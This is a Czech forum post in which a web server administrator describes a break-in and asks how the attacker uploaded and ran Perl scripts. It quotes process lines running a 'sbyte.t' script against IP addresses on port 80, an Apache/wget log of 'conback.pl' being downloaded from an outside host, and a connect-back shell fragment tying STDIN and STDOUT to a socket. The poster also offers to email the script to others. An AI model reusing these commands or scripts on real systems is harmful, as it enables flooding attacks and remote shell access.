Portál AbcLinuxu, 10. května 2025 08:30
sh -c cd /tmp;perl sbyte.t 67.43.159.2 80 99999999999 0 2>&1
sh -c cd /tmp;perl sbyte.t 72.20.3.74 80 99999999999 16 2>&1
... z logů jsem zjistil, že byl tento(a ještě 3 další) nakopírovány z ip 195.213.50.200 výpis logu apache--11:20:39-- http://www.asf.toscana.it/tmp/conback.pl => `conback.pl'
Resolving www.asf.toscana.it... 159.213.50.200
Connecting to www.asf.toscana.it[159.213.50.200]:80... connected.
HTTP request sent, awaiting response... 200 OK Length: 1,100 [text/x-perl]
OK . 100% 10.49 MB/s11:20:39 (10.49 MB/s) - `conback.pl' saved [1100/1100]
-toto mi příjde, jako stažení pomocí wget. Nic víc jsem z logů nenašel,,, Pomocí ssh se na server nepřihlásil. Netušíte, kudy mohl útočník nahrát tyto skripty a hlavně jak je spustil??? Celkem by nám pomotal hlavu, kdyby nechal smazat celý adresář /var/www :(open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET");
config_log_module, mime_module, negotiation_module, status_module, includes_module, autoindex_module, dir_module, cgi_module, speling_module, userdir_module, alias_module, rewrite_module, access_module, auth_module, expires_module, unique_id_module, setenvif_module, dav_module, php4_module
pokuď máte zájem o ten druhý sbyte.t skript, dejte mi mailovku -pošlu Vám to. (teda pokuď to neobrátíte proti mě :) )
Tiskni
Sdílej:
ISSN 1214-1267, (c) 1999-2007 Stickfish s.r.o.